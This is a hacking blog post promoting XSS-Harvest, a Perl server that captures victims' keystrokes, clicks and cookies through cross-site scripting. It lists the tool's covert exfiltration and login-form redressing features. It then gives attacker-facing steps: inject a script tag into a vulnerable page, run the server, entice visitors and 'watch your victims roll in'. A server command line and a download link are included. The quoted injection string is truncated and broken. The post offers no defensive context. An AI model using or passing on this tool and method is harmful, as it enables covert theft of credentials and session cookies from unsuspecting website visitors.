Hack Your Mind Right Now....!

  • Home
  • Android
  • C Language
  • Facebook Hacking
    • 20 FB Tricks
    • Animation in FB
  • DeadlyHacker

XSS-Harvest

Posted by Unknown at 2:53 PM
 Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies

Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affect domain, regardless of whether or not the vulnerability is “reflected” or “persistent”.XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.


  Functionality of xss-harvest:


    * Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks)     to the vulnerable page and sets up communication with the XSS-Harvest server.
    * Any key entered will be sent covertly to the server.
    * Any mouse click performed will be analysed and the data covertly sent to the server.
    * Optionally ‘redress’ the vulnerable page to display a different page on the same subdomain – e.g. a login form.
    * If redressing the victim’s browser, allow subsequently loaded pages to be also ‘infected’ – assuming they don’t break the same-origin policy (i.e. they’re on the same subdomain).
    * Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
    * Each victim has a separate history file containing all events, cookies and keystrokes.
    * Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid confusion).
    * Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
    * Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.

How to Exploit XSS with XSS-Harvest
Identify a page vulnerable to XSS (reflected or persistent will be fine – unless the victim is running IE9 or another plugin such as NoScript).

Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags in to the source of the vulnerable page. Most attackers will insert something like ‘<script>alert(1)</script>’ at this stage to ensure the page is actually vulnerable.

Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.

Insert the following ‘injection string’ into the vulnerable page:
<script src=”>

This will return the client-side JavaScript to the victim, indicated by the ‘i’ in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in – a new history file will be created for each new victim.
To use of the redress function, start the server with the -r parameter:

./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

Basic dependencies:
HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork

Download XSS-Harvest
Email ThisBlogThis!Share to XShare to Facebook

0 comments:

Post a Comment

Newer Post Home Older Post
Subscribe to: Post Comments (Atom)

Like Me On Facebook Mr. Deadly Hacker

About The Author

Unknown
View my complete profile
Aman Badhania writes this blog to help computer users with problems related to web services and getting the most out of their own websites.
Feel The Power Of Cyber Hacking Mr. DeadlyHacker

Popular

    List of google dorks for sql injunction List of google dorks for sql injunction
    no image Keylogger Tutorial
    no image Common Ways To Attack a Network
    no image How to Find XSS Vulnerabilities
    no image Speed Up XP BootingThis is a featured page
    no image Local File Inclusion Vulnerability Scanner
    no image Reliance Hacking

TemplateHits

  • Home
  • About Me
  • Serial Keys 1million
  • Password Hacking
  • Telnet
  • Hacking
  • Download
  • C Language Tips and Trick
Feel The Power Of Cyber Hacking Mr. DeadlyHacker

Hacking Tricks

Hacked Window Hacking Tools Window Software Window 8 Window Tips How To Make Window Genuiene Window 7 Hacking tutorial IP Tips Internet USB Hacking Hardware IGI 3 Internet Tricks Torrent HD movie HTML Hacker Types Hacking Game Hacking Tips Happy Deepawali Hard Disk Hardware Hacking HitMan Game HoneyPot Hosting IGI 2013 Image 2 Text Information Intrusion Detection System (IDS) Tekken 6 Telnet Terminator RAT TrueCaller UserName VLC Player Hacking Virus Visual Script Tricks Window 10 Window 8 Hack Window 9 Window News Window Server Youtube Tips Zombie iPhone

Crack Skull

Crack Skull
Shiiiiiiiiiiiiiiii.....Don't Live This

Followers

Deadly Tricks

Android Android Tips Android Apps Android Hack AntiVirus Hack Aman Badhania About Keylogging Backtrack Blogger Tips Backup Trick Batch Programming Browser APT Access Block Sites Advance Persistant Threat Albert Einstein Android Code Android Games Android Smart Phone Angry birds Application Assassin’s Creed III AutoCad Batch Hacking Blogger tools Bolloywood Movie HD
Facebook Hacking Firefox Imp. Addons Facebook Tips Download Facbook hack Deadly Hacker Desktop Hacking Exploits Email Hacking Data Recovery Desktop Apps Disable Mouse Dos Tools Drawing Arts Drive Icon Change Ethical Hacking Learn File hosting Firefox Download Flash Software

More Tricks

Software Proxy Server Password Hacking Software hacking Opreting System Partition Make Programming Of linux Remix Hacking Reverse Engineering Samsung Mobile Hacking Skin Pack For Window 7 System Hacking Open Source Code PC Hack PenDrive Bootable PenDrive Hacking Phishing Attacks Phreaking Proxy Sites RainMeters Recover Recover Deleted Files Red Hat Registry Hack Reinstall Your All Drivers In 5 MinutesThis is a featured page Resume Spear Phishing
Computer Hacking Backtrack Blogger Tips Command Hacking Crash Computer Cross Site Scripting (XSS) Backup Trick Batch Programming Browser CRIMINAL HACKED Computer trick Batch Hacking Blogger tools Bolloywood Movie HD C# CSS Check Password Coin Box Calling Hacking Cryptography
Aman Badhania
Copyright © 2012 Hack Your Mind Right Now....! - and Deadly Hacker.